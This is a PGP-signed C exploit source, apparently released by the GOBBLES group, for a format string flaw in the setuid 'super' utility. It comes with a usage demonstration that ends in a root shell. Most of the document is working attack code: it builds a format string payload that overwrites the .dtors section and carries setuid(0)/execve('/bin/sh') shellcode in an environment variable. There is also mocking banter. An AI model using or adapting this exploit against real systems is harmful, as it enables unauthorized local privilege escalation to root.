-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
!!! ITS NOT TOO LATE..BUT HURRY !!!
!!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
Political statement:
/*
hehehe ;PPpPPPPp
/* Proof Of Concept:
$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super
Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]
$ objdump -s -j .dtors /usr/local/bin/super
/usr/local/bin/super: file format elf32-i386
Contents of section .dtors:
8063f7c ffffffff 00000000 …
$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define ALLIGN 2
#define DPA 29
#define SUPER "/usr/local/bin/super"
void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);
extern char **environ;
char string[256];
int
main(int argc, char **argv)
{
unsigned long t, w;
int dpa, allign, shift = 0;
char c, *store;
if(argc == 1) {
fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o
<offset> -A <allignment> ]\n", argv[0]);
exit(0);
}
allign = ALLIGN;
dpa = DPA;
while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
switch(c) {
case 't':
sscanf(optarg, "%p", &store);
t = (long)store;
t += 4;
break;
case 'o':
dpa = atoi(optarg);
break;
case 'A':
allign = atoi(optarg);
break;
default:
fprintf(stderr, "hehehe ;PPppPPPp\n");
exit(0);
}
}
store = NULL;
if((store = getenv("GOBBLES")) == NULL) {
stuff();
if(execve(argv[0], argv, environ)) {
fprintf(stderr, ". problem re-executing\n");
exit(1);
}
}
w = (long)store;
// shift is signed so this works both ways
shift = (strlen(argv[0]) - strlen(SUPER));
w += shift;
fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
buildstring(t, w, dpa, allign);
if(execl(SUPER, "super", string, NULL)) {
fprintf(stderr, "error executing\n");
exit(1);
}
}
void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
unsigned int un, deux, x, b[4], namelen;
char a_buf[4];
struct passwd *pass;
memset(string, '\0', sizeof(string));
memset(a_buf, '\0', sizeof(a_buf));
if((pass = getpwuid(getuid())) == NULL) {
fprintf(stderr, ". can't find your username\n");
exit(1);
}
namelen = strlen(pass->pw_name);
fprintf(stderr, ". username: %d bytes\n", namelen);
for(x = 0; x < allign && x < sizeof(a_buf); x++)
a_buf[x] = 'x';
b[0] = (t & 0x000000ff);
b[1] = (t & 0x0000ff00) >> 8;
b[2] = (t & 0x00ff0000) >> 16;
b[3] = (t & 0xff000000) >> 24;
un = (w >> 16) & 0xffff;
deux = w & 0xffff;
if(un < deux) {
snprintf(string, sizeof(string)-1,
"%s"
"%c%c%c%c%c%c%c%c"
"%%.%hdx" "%%%d$hn"
"%%.%hdx" "%%%d$hn",
a_buf,
b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
un - (8 + allign + 29 + namelen),
dpa, deux - un, dpa + 1
);
}
else {
snprintf(string, sizeof(string)-1,
"%s"
"%c%c%c%c%c%c%c%c"
"%%.%hdx" "%%%d$hn"
"%%.%hdx" "%%%d$hn",
a_buf,
b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
deux - (8 + allign + 29 + namelen),
dpa, un-deux, dpa + 1
);
}
}
void
stuff(void)
{
char code[] = // the setuid 0 with the execve of the /bin/sh
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
setenv("GOBBLES", code, 1);
}
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----